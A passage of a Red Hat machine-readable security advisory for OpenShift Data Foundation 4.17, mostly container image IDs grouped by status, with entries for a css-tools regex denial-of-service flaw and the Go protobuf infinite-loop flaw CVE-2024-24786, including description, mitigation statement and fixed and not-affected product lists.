"9Base-RHODF-4.17:odf4/odf-csi-addons-operator-bundle@sha256:f3f28074884a29b5d28f4535af6489f1ca8326dd60689c4bc8c862277dcb6e22_ppc64le",
"9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:12e2b71cea2c63fb14363334287f5affa4ff3dc84f24dd51b5f57ba6a751c2da_amd64",
"9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:7fa969e6714e0c3851f30999df5c823cd5738f28e1b2f6c06d940541c6edad4e_s390x",
"9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:a0ac08a8a3ee9155338182d47bf55595a78aec3811c70f3fedb2ed461aad3319_arm64",
"9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:b96b09407708601d04abb6a90d16f6f1260839534d64238b6aa4c7a5f458a6a4_ppc64le",
"9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:02e65965166ec9794f11b663de59671f159f8b2fef4d56ee5589b26bef342168_s390x",
"9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:322bae96941ede565a681ad98fc287f442f36888e0ed2b5ec4b309c702c7488b_amd64",
"9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:6e44cf5a814ceb7fea6ef925f6381a279837ebe2baf2980f4937e0c752afa5e2_arm64",
"9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:7a206b9fe0e540674fc9ec97b338607e61b8bfd3bfe30855835d0a940ca9304c_ppc64le",
"9Base-RHODF-4.17:odf4/odf-multicluster-console-rhel9@sha256:25052271f038b691ef973ac5a9fc02eee015a0427e087a5a390f1e31f7823d79_ppc64le",
"9Base-RHODF-4.17:odf4/odf-multicluster-console-rhel9@sha256:3342a17a1afca419dbfbff815261e91cdf8dcf0eecaf5a25a1713a39f3f95bf4_amd64",
"9Base-RHODF-4.17:odf4/odf-multicluster-console-rhel9@sha256:df597ffd1b0d14d394e39b1d92fc90797bea5386a390450193d99f7db5bc377c_s390x",
"9Base-RHODF-4.17:odf4/odf-multicluster-operator-bundle@sha256:883ba750931a93d30ff1dd3ed78592940a0079640da3d79400261f43fbecb69f_s390x",
"9Base-RHODF-4.17:odf4/odf-multicluster-operator-bundle@sha256:baf554d45b1fb4b38b264145809c10c7733120104bc4d8bd9e1ecb0c428db382_ppc64le",
"9Base-RHODF-4.17:odf4/odf-multicluster-operator-bundle@sha256:c05b5597918214f845c7243b7407b6cc3c88f644eec504585bd411727376b898_amd64",
"9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:0810e85e929ad83a8593eab74a312b9c49ec94ea9833a37b7f06bca87ca9647b_ppc64le",
"9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:54cec6c71192cc9cb6c2bbcd812a5dcccd4905d5d7e822b4012622bb235fe75c_arm64",
"9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:66de77eb933a0fb4e0d98d2c1326212d494f6c3aa2e235f27f2a641fb31ff4af_s390x",
"9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:941371cee3ee7dd127d5663b7e1bcb39c6565031c11fb508f07c40f37aaee4d1_amd64",
"9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:6978d438b80f8fd7572c792155c2f86cc6fa55ff0b8cb1d45bbe04e42d185fe3_ppc64le",
"9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:7c09fb5c685be2a3029d02a35417e681f3b034269d1ac3014c1c5cdd2e035e61_s390x",
"9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:8ccd7099f174842dab551c27a55d822cfb12d8ba26c3528f605697cbfbbf8e70_amd64",
"9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:d0a1a2f77001e06cdb650b857433d6eebeb53eb5337354c8a042003db80387db_arm64",
"9Base-RHODF-4.17:odf4/odf-operator-bundle@sha256:01d80d9fc9cbc3f3fecab4716bde805ad97b1fbcd4942ecbb07eab9fb4714012_s390x",
"9Base-RHODF-4.17:odf4/odf-operator-bundle@sha256:6e3b814a41abf41ec9cdb5d71aafc79a086fc37f2986a3fd74f75341a4af91a2_amd64",
"9Base-RHODF-4.17:odf4/odf-operator-bundle@sha256:f8e5b7818849a95ca57347496baa35507ce634c645643303205309f55572db7d_ppc64le",
"9Base-RHODF-4.17:odf4/odf-prometheus-operator-bundle@sha256:0d5aa39387a341a497a0cbc8d18c0e1e050e118b08243f5d8395ffe7394cc5f1_amd64",
"9Base-RHODF-4.17:odf4/odf-prometheus-operator-bundle@sha256:26541764bf0b79a4cc87600d1a1981a247d7678f9a8c37af62e80f22213159a7_s390x",
"9Base-RHODF-4.17:odf4/odf-prometheus-operator-bundle@sha256:75a85b98bcfa527709b8b1f16694a8bf68d5ea84a66b73baf5fea927df6e2904_ppc64le",
"9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:37af72217b81a8a7b0d968ec09a396f1840155f2a472eaa68927281f080d137f_amd64",
"9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:70ff7d9b8f6fb97fbe72768ed97519cd9e2b60dedbe1133d17fd0e317079ab3f_ppc64le",
"9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:9d7f8b892351de60609c30d187c5547ba4bec3be2dadd0e6d8ded2c4f3c1e79e_s390x",
"9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:f94cd1be8e371e8c85062be3e4475157cb628d339c1716bf96167e02703edf97_arm64",
"9Base-RHODF-4.17:odf4/odr-cluster-operator-bundle@sha256:1b641a6aa2c4b1bc79ab0188c56f533fd89459be71b2b34f794faebaa66fd1f5_s390x",
"9Base-RHODF-4.17:odf4/odr-cluster-operator-bundle@sha256:1e2ebbe9f71a03bfc6a0bd90f786293d9eec473ba2d570c8662a7f8d03dcc1b4_ppc64le",
"9Base-RHODF-4.17:odf4/odr-cluster-operator-bundle@sha256:40d75cfa1eb657512dc4da888a5bb793a3ef3d6726665bc9ad7009cdd4166a1f_amd64",
"9Base-RHODF-4.17:odf4/odr-hub-operator-bundle@sha256:22c88c1f6be208bc0a5f0053f99ea728b9e457e150b4236a04304810270f1f80_ppc64le",
"9Base-RHODF-4.17:odf4/odr-hub-operator-bundle@sha256:50d04e71ae52f1a246d1509c5f2abbcb2f2bb2209090526b3357b8012b4b67d5_s390x",
"9Base-RHODF-4.17:odf4/odr-hub-operator-bundle@sha256:d7e8549c1a5cabd7324c589eadf9ccebccc1abbfb69d47826baaeaebc283c6a3_amd64",
"9Base-RHODF-4.17:odf4/odr-recipe-operator-bundle@sha256:0223d74679590c8a5fbd34f3d793c05ec671ecb406b2055166bd54f09f75bbda_amd64",
"9Base-RHODF-4.17:odf4/odr-recipe-operator-bundle@sha256:137a8a07adae2c0bb5fd1ac2a5823ffd85abe1035512a04e112e55b0aa3dc163_ppc64le",
"9Base-RHODF-4.17:odf4/odr-recipe-operator-bundle@sha256:987ed8aa1347a831f61a4d65011f5bd00a700c65f6e7fa669ff3f38131425705_s390x",
"9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:2f414dc954bca2cd17f0bbabea11a8f18437eb417c6266d8c4750ba96957fc87_amd64",
"9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:bf140f64657478a7f94bacd6784f7b7727d5df9ae8eb4c526f86d5533bff06ae_arm64",
"9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:d9c38fe43617f214fea848ef7124d77f30358e2049390fc3bd3526986ff9ebbb_s390x",
"9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:fc251ea3c441bd0d3e358969fb6730bb9e53e340da9eff8bb6a173a37116c943_ppc64le",
"9Base-RHODF-4.17:odf4/rook-ceph-operator-bundle@sha256:1055afb10a6ce469d2c77337878f510b29375a830f14505042da8a6d6081c438_amd64",
"9Base-RHODF-4.17:odf4/rook-ceph-operator-bundle@sha256:5df96c3b3dc8cdad2c8b42fd9378dc55779cdb11f64eea5fa653101505d4d497_s390x",
"9Base-RHODF-4.17:odf4/rook-ceph-operator-bundle@sha256:7cb791603d9d7c8c1c8e5200f96401ad0fadc5db14ad698e7a9519d046d0fdd0_ppc64le",
"9Base-RHODF-4.17:odf4/rook-ceph-rhel9-operator@sha256:7488149277a76efe188086d283fa2acf732a4eca8bdeaa4de8744204876a77a2_amd64",
"9Base-RHODF-4.17:odf4/rook-ceph-rhel9-operator@sha256:b89943771e55457bd3765efd5f3e6e6697953ee9e5c7bd123921a274b79536d3_ppc64le",
"9Base-RHODF-4.17:odf4/rook-ceph-rhel9-operator@sha256:cf89aaa1ad0614707748c0ab0b26ee40855053b0f4932cd5edaa8ccf8b1470e7_s390x"
]
}
],
"threats": [
{
"category": "impact",
"details": "Moderate"
}
],
"title": "css-tools: Improper Input Validation causes Denial of Service via Regular Expression"
},
{
"cve": "CVE-2024-24786",
"cwe": {
"id": "CWE-835",
"name": "Loop with Unreachable Exit Condition (\u0027Infinite Loop\u0027)"
},
"discovery_date": "2024-03-06T00:00:00+00:00",
"flags": [
{
"label": "vulnerable_code_not_present",
"product_ids": [
"9Base-RHODF-4.17:odf4/cephcsi-operator-bundle@sha256:2b9e511b21d4fefe8450f014962f2450db3e64af07f5e6e4bbfdaafafdfdc1f4_ppc64le",
"9Base-RHODF-4.17:odf4/cephcsi-operator-bundle@sha256:9a822fddffde8f67711c5025a89e003341011e0b8145cfd5b840849cabbe68a0_amd64",
"9Base-RHODF-4.17:odf4/cephcsi-operator-bundle@sha256:e35426de9ea6419f4981d8c6861867fc3eadcde4e41757b9a8f1ed4f2fa00dc9_s390x",
"9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:78656a47235af49c9a7bc75d9729987edf39a77077a3f478f5b46658df18878a_amd64",
"9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:92544e943e160d8fce1a9710a9d67ca4ccb795ff846edf7717d1e52835899202_ppc64le",
"9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:9615793800efca765c5ae588e0547e4e18bdfe264c8a92303fbbc39276c74580_s390x",
"9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:d6e30344ec1d541b6791b0e58cb48f4f3f492069ff8392005e8d1f16350c80e2_arm64",
"9Base-RHODF-4.17:odf4/cephcsi-rhel9@sha256:7bc24afafec3a0896c887d7eeeca47eb6f0cb12e35c62aa212ce55210cb1512d_amd64",
"9Base-RHODF-4.17:odf4/cephcsi-rhel9@sha256:93b238c24a3623bd635e162caa9a30ad7158db25eb83b545e9b365db0f769161_ppc64le",
"9Base-RHODF-4.17:odf4/cephcsi-rhel9@sha256:fb6507b95b53b19d90b82c3ac2a3b0264ebbdb9d4a8ceff3006e8a446a1cef49_s390x",
"9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:22b568f083c7563ffbb8d23807837a0f78cedeb156cffe9110906f3b6e0c70fb_arm64",
"9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:50f66564131a5b2b695582956c80515d7eea64d1c009479665937c97a76e2348_ppc64le",
"9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:a27c28ecf714cc248323a35eb58daec2aa611a318f0e61eb0defe0eaa80eb2f4_amd64",
"9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:bee14d945af0620ad1666e67be750324a1814cbf573256c1c88521e18f9877f7_s390x",
"9Base-RHODF-4.17:odf4/mcg-operator-bundle@sha256:71b79ea2f0356740a0e53e89a0422f8da608dd43337dd07dfcbadc9f9d8a8884_amd64",
"9Base-RHODF-4.17:odf4/mcg-operator-bundle@sha256:729fdaad48dfca53af4b3bf9bbf3cbf9dd25d5c50ddcbac03d0e8738aeb997cc_s390x",
"9Base-RHODF-4.17:odf4/mcg-operator-bundle@sha256:ed0d44fd0215cd299b4929617fa1f05ea31c6ee3cc078fbf6cc884e02a59beee_ppc64le",
"9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:1d189e8c4dfcc998d5887e1c5f06e874fa0beed29bc8f87f279299d58124a505_arm64",
"9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:5f92812a17a6637280387a3033865d8bd13ee8d6506f8e17489cefb79c53f58e_amd64",
"9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:7eba9da5ba5071b411bc99d33eee04e3f4530516ad984524920de542629e9b55_ppc64le",
"9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:f8c6007e32c54ffe0597952ae6eb1d38435188d605f3995ec785dff43da4257d_s390x",
"9Base-RHODF-4.17:odf4/ocs-client-console-rhel9@sha256:824823d527bdbbdd2abb773e054c12b41243e15467ada76689af4fdd6fae894a_s390x",
"9Base-RHODF-4.17:odf4/ocs-client-console-rhel9@sha256:9521eae22f7669dea4b31841d7cfe11e5d92155b11785afb2977cea9c5d917dc_ppc64le",
"9Base-RHODF-4.17:odf4/ocs-client-console-rhel9@sha256:a94961fd2c5aea06922c9c365c3a6296abf073e09a520f190a45f687cabc7b1d_amd64",
"9Base-RHODF-4.17:odf4/ocs-client-operator-bundle@sha256:26503c487a93ad520e1953ccad9200be808bc93648db90eaba3a73a340483541_ppc64le",
"9Base-RHODF-4.17:odf4/ocs-client-operator-bundle@sha256:78f3e869e50bd0e69d8e6efc6e6de357aadcc06ac3659d6ec7a053cda11be88b_amd64",
"9Base-RHODF-4.17:odf4/ocs-client-operator-bundle@sha256:fb473ae152002d124ff662e94ca9bf68f8f6a4c61c40d4f2929a55ef1c25cd20_s390x",
"9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:0bb022ca33965fb0f9de7df36f15377a33c90d873050dcbd763370ac1f06295a_s390x",
"9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:1070f8191e3ead7781876ed4d84ac5c5eeb54a1fa4d2c40701ebf393d345111c_ppc64le",
"9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:8dbdc5fb2b8d4551e5896f65654b3dae8a5164c12b1e1ec6d7fdda348a7b8c7d_arm64",
"9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:e7afe93fc1d88c385edc3d8ab3173e7bfb4a4f890d371836d5d2f72a2eb4abb5_amd64",
"9Base-RHODF-4.17:odf4/ocs-metrics-exporter-rhel9@sha256:147c2497071460ba266fc5ef0768d82edb6be9d7ffaa0c514e49308cf8017e7a_ppc64le",
"9Base-RHODF-4.17:odf4/ocs-metrics-exporter-rhel9@sha256:28fd2ef06dbf379ad4204877a3492933a731f2bc1d6dd7fc1600f52a3dc3ca47_amd64",
"9Base-RHODF-4.17:odf4/ocs-metrics-exporter-rhel9@sha256:6616912ec376e6993346b38bf637eb47d7a00aa9f58120899470c8353be02a0e_s390x",
"9Base-RHODF-4.17:odf4/ocs-operator-bundle@sha256:60f6533b7262bbfad59c5e14dff71878d3ea501c3b46194155ce53bc43a119e4_amd64",
"9Base-RHODF-4.17:odf4/ocs-operator-bundle@sha256:664c467321c9a5c3fec9d4fd85e16ab50677684b480cd1f346638f794ee7357c_s390x",
"9Base-RHODF-4.17:odf4/ocs-operator-bundle@sha256:b14752e1e9e6b004429f3c36dbaf4ec4d36d22ab9ac84c2d5158e8fbdfb214dd_ppc64le",
"9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:3472c7c043b318c2569e8a900527b13d052f1860082dba13723514795cedeec0_ppc64le",
"9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:54828ef99fc8d8fa3801c2ea0338a56f382018e4ae1a800dcd328fe43f7149be_arm64",
"9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:54a164ce15d25597fa3939709acbe467f728ce4f4165771a685fc507edfb92a3_s390x",
"9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:cfa36a55dc542e3e1332a55a59588a753f80e32d905847e51efdd1478fd58f0b_amd64",
"9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:0e2a71ed4eaa44f786428e18e01d90d3b0384169c78c5654e2ebbaac3a5ee2a4_ppc64le",
"9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:8046b84915034f60a5e5e349b001f04b713b3aa71ced136390c5086e0c351dd4_amd64",
"9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:9cbf21dad9ed5738ae1feb112707af3e74e02784795addf07ee4228bbd22e932_s390x",
"9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:a42d48b82e34f1f7cb731c3bdd25e81dc5ff3a61a3ca0b8b5eecefb5e2218be0_arm64",
"9Base-RHODF-4.17:odf4/odf-console-rhel9@sha256:89cc7f0d6adb957e0f3adbdb2c023d4a6dda89e388a94d0b4015e0853971075e_ppc64le",
"9Base-RHODF-4.17:odf4/odf-console-rhel9@sha256:917e625bfea670e543f857cf7cea31380b76ceac862bee61cc490cebabd23081_amd64",
"9Base-RHODF-4.17:odf4/odf-console-rhel9@sha256:b1ba270980579090845909bb4f1e8a7b98ce8816c7c5ea60903432d138d29310_s390x",
"9Base-RHODF-4.17:odf4/odf-cosi-sidecar-rhel9@sha256:2be1d5ad630b9e91f30e0c82cfee52231d095cee87908949170e40a39f4ed814_ppc64le",
"9Base-RHODF-4.17:odf4/odf-cosi-sidecar-rhel9@sha256:37ec39720b1ce9701630635f158ad20414b1cda335b15b11526a7838ed189a54_s390x",
"9Base-RHODF-4.17:odf4/odf-cosi-sidecar-rhel9@sha256:7c59771279f5227246a941925160ca2f9fc169bd13972ab68a476e62308707e1_amd64",
"9Base-RHODF-4.17:odf4/odf-csi-addons-operator-bundle@sha256:328ddae72c795012c7671c214d9a84d539264f8fe855d1a9e2dbb74590e72076_s390x",
"9Base-RHODF-4.17:odf4/odf-csi-addons-operator-bundle@sha256:99d8b3aedcc57f57716bba144b991f7f223cdcc47ec37903c85aa20df295b3d4_amd64",
"9Base-RHODF-4.17:odf4/odf-csi-addons-operator-bundle@sha256:f3f28074884a29b5d28f4535af6489f1ca8326dd60689c4bc8c862277dcb6e22_ppc64le",
"9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:12e2b71cea2c63fb14363334287f5affa4ff3dc84f24dd51b5f57ba6a751c2da_amd64",
"9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:7fa969e6714e0c3851f30999df5c823cd5738f28e1b2f6c06d940541c6edad4e_s390x",
"9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:a0ac08a8a3ee9155338182d47bf55595a78aec3811c70f3fedb2ed461aad3319_arm64",
"9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:b96b09407708601d04abb6a90d16f6f1260839534d64238b6aa4c7a5f458a6a4_ppc64le",
"9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:02e65965166ec9794f11b663de59671f159f8b2fef4d56ee5589b26bef342168_s390x",
"9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:322bae96941ede565a681ad98fc287f442f36888e0ed2b5ec4b309c702c7488b_amd64",
"9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:6e44cf5a814ceb7fea6ef925f6381a279837ebe2baf2980f4937e0c752afa5e2_arm64",
"9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:7a206b9fe0e540674fc9ec97b338607e61b8bfd3bfe30855835d0a940ca9304c_ppc64le",
"9Base-RHODF-4.17:odf4/odf-multicluster-console-rhel9@sha256:25052271f038b691ef973ac5a9fc02eee015a0427e087a5a390f1e31f7823d79_ppc64le",
"9Base-RHODF-4.17:odf4/odf-multicluster-console-rhel9@sha256:3342a17a1afca419dbfbff815261e91cdf8dcf0eecaf5a25a1713a39f3f95bf4_amd64",
"9Base-RHODF-4.17:odf4/odf-multicluster-console-rhel9@sha256:df597ffd1b0d14d394e39b1d92fc90797bea5386a390450193d99f7db5bc377c_s390x",
"9Base-RHODF-4.17:odf4/odf-multicluster-operator-bundle@sha256:883ba750931a93d30ff1dd3ed78592940a0079640da3d79400261f43fbecb69f_s390x",
"9Base-RHODF-4.17:odf4/odf-multicluster-operator-bundle@sha256:baf554d45b1fb4b38b264145809c10c7733120104bc4d8bd9e1ecb0c428db382_ppc64le",
"9Base-RHODF-4.17:odf4/odf-multicluster-operator-bundle@sha256:c05b5597918214f845c7243b7407b6cc3c88f644eec504585bd411727376b898_amd64",
"9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:6978d438b80f8fd7572c792155c2f86cc6fa55ff0b8cb1d45bbe04e42d185fe3_ppc64le",
"9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:7c09fb5c685be2a3029d02a35417e681f3b034269d1ac3014c1c5cdd2e035e61_s390x",
"9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:8ccd7099f174842dab551c27a55d822cfb12d8ba26c3528f605697cbfbbf8e70_amd64",
"9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:d0a1a2f77001e06cdb650b857433d6eebeb53eb5337354c8a042003db80387db_arm64",
"9Base-RHODF-4.17:odf4/odf-operator-bundle@sha256:01d80d9fc9cbc3f3fecab4716bde805ad97b1fbcd4942ecbb07eab9fb4714012_s390x",
"9Base-RHODF-4.17:odf4/odf-operator-bundle@sha256:6e3b814a41abf41ec9cdb5d71aafc79a086fc37f2986a3fd74f75341a4af91a2_amd64",
"9Base-RHODF-4.17:odf4/odf-operator-bundle@sha256:f8e5b7818849a95ca57347496baa35507ce634c645643303205309f55572db7d_ppc64le",
"9Base-RHODF-4.17:odf4/odf-prometheus-operator-bundle@sha256:0d5aa39387a341a497a0cbc8d18c0e1e050e118b08243f5d8395ffe7394cc5f1_amd64",
"9Base-RHODF-4.17:odf4/odf-prometheus-operator-bundle@sha256:26541764bf0b79a4cc87600d1a1981a247d7678f9a8c37af62e80f22213159a7_s390x",
"9Base-RHODF-4.17:odf4/odf-prometheus-operator-bundle@sha256:75a85b98bcfa527709b8b1f16694a8bf68d5ea84a66b73baf5fea927df6e2904_ppc64le",
"9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:37af72217b81a8a7b0d968ec09a396f1840155f2a472eaa68927281f080d137f_amd64",
"9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:70ff7d9b8f6fb97fbe72768ed97519cd9e2b60dedbe1133d17fd0e317079ab3f_ppc64le",
"9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:9d7f8b892351de60609c30d187c5547ba4bec3be2dadd0e6d8ded2c4f3c1e79e_s390x",
"9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:f94cd1be8e371e8c85062be3e4475157cb628d339c1716bf96167e02703edf97_arm64",
"9Base-RHODF-4.17:odf4/odr-cluster-operator-bundle@sha256:1b641a6aa2c4b1bc79ab0188c56f533fd89459be71b2b34f794faebaa66fd1f5_s390x",
"9Base-RHODF-4.17:odf4/odr-cluster-operator-bundle@sha256:1e2ebbe9f71a03bfc6a0bd90f786293d9eec473ba2d570c8662a7f8d03dcc1b4_ppc64le",
"9Base-RHODF-4.17:odf4/odr-cluster-operator-bundle@sha256:40d75cfa1eb657512dc4da888a5bb793a3ef3d6726665bc9ad7009cdd4166a1f_amd64",
"9Base-RHODF-4.17:odf4/odr-hub-operator-bundle@sha256:22c88c1f6be208bc0a5f0053f99ea728b9e457e150b4236a04304810270f1f80_ppc64le",
"9Base-RHODF-4.17:odf4/odr-hub-operator-bundle@sha256:50d04e71ae52f1a246d1509c5f2abbcb2f2bb2209090526b3357b8012b4b67d5_s390x",
"9Base-RHODF-4.17:odf4/odr-hub-operator-bundle@sha256:d7e8549c1a5cabd7324c589eadf9ccebccc1abbfb69d47826baaeaebc283c6a3_amd64",
"9Base-RHODF-4.17:odf4/odr-recipe-operator-bundle@sha256:0223d74679590c8a5fbd34f3d793c05ec671ecb406b2055166bd54f09f75bbda_amd64",
"9Base-RHODF-4.17:odf4/odr-recipe-operator-bundle@sha256:137a8a07adae2c0bb5fd1ac2a5823ffd85abe1035512a04e112e55b0aa3dc163_ppc64le",
"9Base-RHODF-4.17:odf4/odr-recipe-operator-bundle@sha256:987ed8aa1347a831f61a4d65011f5bd00a700c65f6e7fa669ff3f38131425705_s390x",
"9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:2f414dc954bca2cd17f0bbabea11a8f18437eb417c6266d8c4750ba96957fc87_amd64",
"9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:bf140f64657478a7f94bacd6784f7b7727d5df9ae8eb4c526f86d5533bff06ae_arm64",
"9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:d9c38fe43617f214fea848ef7124d77f30358e2049390fc3bd3526986ff9ebbb_s390x",
"9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:fc251ea3c441bd0d3e358969fb6730bb9e53e340da9eff8bb6a173a37116c943_ppc64le",
"9Base-RHODF-4.17:odf4/rook-ceph-operator-bundle@sha256:1055afb10a6ce469d2c77337878f510b29375a830f14505042da8a6d6081c438_amd64",
"9Base-RHODF-4.17:odf4/rook-ceph-operator-bundle@sha256:5df96c3b3dc8cdad2c8b42fd9378dc55779cdb11f64eea5fa653101505d4d497_s390x",
"9Base-RHODF-4.17:odf4/rook-ceph-operator-bundle@sha256:7cb791603d9d7c8c1c8e5200f96401ad0fadc5db14ad698e7a9519d046d0fdd0_ppc64le",
"9Base-RHODF-4.17:odf4/rook-ceph-rhel9-operator@sha256:7488149277a76efe188086d283fa2acf732a4eca8bdeaa4de8744204876a77a2_amd64",
"9Base-RHODF-4.17:odf4/rook-ceph-rhel9-operator@sha256:b89943771e55457bd3765efd5f3e6e6697953ee9e5c7bd123921a274b79536d3_ppc64le",
"9Base-RHODF-4.17:odf4/rook-ceph-rhel9-operator@sha256:cf89aaa1ad0614707748c0ab0b26ee40855053b0f4932cd5edaa8ccf8b1470e7_s390x"
]
}
],
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2268046"
}
],
"notes": [
{
"category": "description",
"text": "A flaw was found in Golang\u0027s protobuf module, where the unmarshal function can enter an infinite loop when processing certain invalid inputs. This issue occurs during unmarshaling into a message that includes a google.protobuf.Any or when the UnmarshalOptions.DiscardUnknown option is enabled. This flaw allows an attacker to craft malicious input tailored to trigger the identified flaw in the unmarshal function. By providing carefully constructed invalid inputs, they could potentially cause the function to enter an infinite loop, resulting in a denial of service condition or other unintended behaviors in the affected system.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "golang-protobuf: encoding/protojson, internal/encoding/json: infinite loop in protojson.Unmarshal when unmarshaling certain forms of invalid JSON",
"title": "Vulnerability summary"
},
{
"category": "other",
"text": "Within regulated environments, a combination of the following controls acts as a significant barrier to successfully exploiting a CWE-835: Loop with Unreachable Exit Condition (\u0027Infinite Loop\u0027) vulnerability and therefore downgrades the severity of this particular CVE from Moderate to Low.\n\nThe platform enforces hardening guidelines to ensure the most restrictive setting needed for operational requirements. Event logs are collected and processed for centralization, correlation, analysis, monitoring, reporting, alerting, and retention. This process ensures that audit logs are generated for specific events involving sensitive information, enabling capabilities like excessive CPU usage, long execution times, or processes consuming abnormal amounts of memory. Static code analysis and peer code review techniques are used to execute robust input validation and error-handling mechanisms to ensure all user inputs are thoroughly validated, preventing infinite loops caused by malformed or unexpected input, such as unbounded user input or unexpected null values that cause loops to never terminate. In the event of successful exploitation, process isolation limits the effect of an infinite loop to a single process rather than allowing it to consume all system resources.",
"title": "Statement"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:0810e85e929ad83a8593eab74a312b9c49ec94ea9833a37b7f06bca87ca9647b_ppc64le",
"9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:54cec6c71192cc9cb6c2bbcd812a5dcccd4905d5d7e822b4012622bb235fe75c_arm64",
"9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:66de77eb933a0fb4e0d98d2c1326212d494f6c3aa2e235f27f2a641fb31ff4af_s390x",
"9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:941371cee3ee7dd127d5663b7e1bcb39c6565031c11fb508f07c40f37aaee4d1_amd64"
],
"known_not_affected": [
"9Base-RHODF-4.17:odf4/cephcsi-operator-bundle@sha256:2b9e511b21d4fefe8450f014962f2450db3e64af07f5e6e4bbfdaafafdfdc1f4_ppc64le",
"9Base-RHODF-4.17:odf4/cephcsi-operator-bundle@sha256:9a822fddffde8f67711c5025a89e003341011e0b8145cfd5b840849cabbe68a0_amd64",
"9Base-RHODF-4.17:odf4/cephcsi-operator-bundle@sha256:e35426de9ea6419f4981d8c6861867fc3eadcde4e41757b9a8f1ed4f2fa00dc9_s390x",
"9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:78656a47235af49c9a7bc75d9729987edf39a77077a3f478f5b46658df18878a_amd64",
"9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:92544e943e160d8fce1a9710a9d67ca4ccb795ff846edf7717d1e52835899202_ppc64le",
"9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:9615793800efca765c5ae588e0547e4e18bdfe264c8a92303fbbc39276c74580_s390x",
"9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:d6e30344ec1d541b6791b0e58cb48f4f3f492069ff8392005e8d1f16350c80e2_arm64",
